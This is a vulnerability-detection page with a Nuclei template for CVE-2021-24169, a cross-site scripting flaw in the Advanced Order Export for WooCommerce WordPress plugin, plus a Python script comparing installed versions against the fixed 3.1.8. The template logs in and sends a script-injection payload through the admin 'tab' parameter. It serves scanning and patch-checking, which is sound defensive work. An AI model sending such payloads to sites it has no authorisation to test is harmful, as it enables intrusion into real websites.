WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
ID: CVE-2021-24169
Severity: medium
Author: r3Y3r53
Tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus
Description
WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
YAML Source
```yaml
id: CVE-2021-24169

info:
  name: WordPress Advanced Order Export For WooCommerce <3.1.8 - Authenticated Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise.
  remediation: Fixed in version 3.1.8.
  reference:
    - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3
    - https://www.exploit-db.com/exploits/50324
    - https://wordpress.org/plugins/woo-order-export-lite/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24169
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24169
    cwe-id: CWE-79
    epss-score: 0.0021
    epss-percentile: 0.5893
    cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: algolplus
    product: advanced_order_export
    framework: wordpress
  tags: cve2021,cve,wordpress,authenticated,wpscan,xss,wp-plugin,wp,woo-order-export-lite,edb,algolplus

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=wc-order-export&tab=</script><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "<script>alert(document.domain)</script>")'
          - 'contains(body_2, "woo-order-export-lite")'
        condition: and
# digest: 490a00463044022044bb9411563940c16f56defb335f0988371c8486e1409baad2841b14fe10feba02207c95f8d410fd3c1c0f794f0576d343208b2622c6072c91917e88534d48482f36:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24169.yaml"
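
The template's remediation field states the issue is fixed in 3.1.8, so an inventory check can compare the installed plugin version against that without sending the probe request. The following is an added example, not part of the template or the plugin's code; it assumes the text of the plugin's `readme.txt` (WordPress `Stable tag:` header) or main PHP file (`Version:` header) has already been read, and the sample inputs are constructed.

```python
import re

FIXED_VERSION = "3.1.8"  # taken from the template's remediation field

# WordPress plugin headers: "Stable tag:" in readme.txt, "Version:" in the main PHP file.
# The leading character class tolerates PHP doc-comment prefixes such as " * ".
_HEADER_RE = re.compile(
    r"^[ \t/*#@]*(?:Stable tag|Version):\s*([0-9][0-9A-Za-z.\-]*)\s*$",
    re.IGNORECASE | re.MULTILINE,
)


def parse_version(text):
    """Return the declared plugin version string, or None if no numeric header is found."""
    match = _HEADER_RE.search(text)
    return match.group(1) if match else None


def version_key(version):
    """Turn '3.1.7' into (3, 1, 7); a component without leading digits counts as 0."""
    parts = []
    for piece in version.split("."):
        digits = re.match(r"\d+", piece)
        parts.append(int(digits.group()) if digits else 0)
    return tuple(parts)


def is_affected(text, fixed=FIXED_VERSION):
    """True if older than the fixed release, False if not, None if undetermined."""
    version = parse_version(text)
    if version is None:
        return None  # e.g. "Stable tag: trunk": needs manual review, not a pass
    a, b = version_key(version), version_key(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))  # pad so "3.1" compares as 3.1.0
    b += (0,) * (width - len(b))
    return a < b  # numeric tuple compare, so 3.1.10 is newer than 3.1.8


# Constructed sample inputs (not taken from a real installation).
SAMPLE_README_OLD = "=== Advanced Order Export For WooCommerce ===\nRequires at least: 4.7\nStable tag: 3.1.7\n"
SAMPLE_PHP_FIXED = "/**\n * Plugin Name: Advanced Order Export For WooCommerce\n * Version: 3.1.8\n */\n"
SAMPLE_README_TRUNK = "=== Advanced Order Export For WooCommerce ===\nStable tag: trunk\n"
```

A `None` result means the version could not be read and the site should be checked another way, for example with the template above.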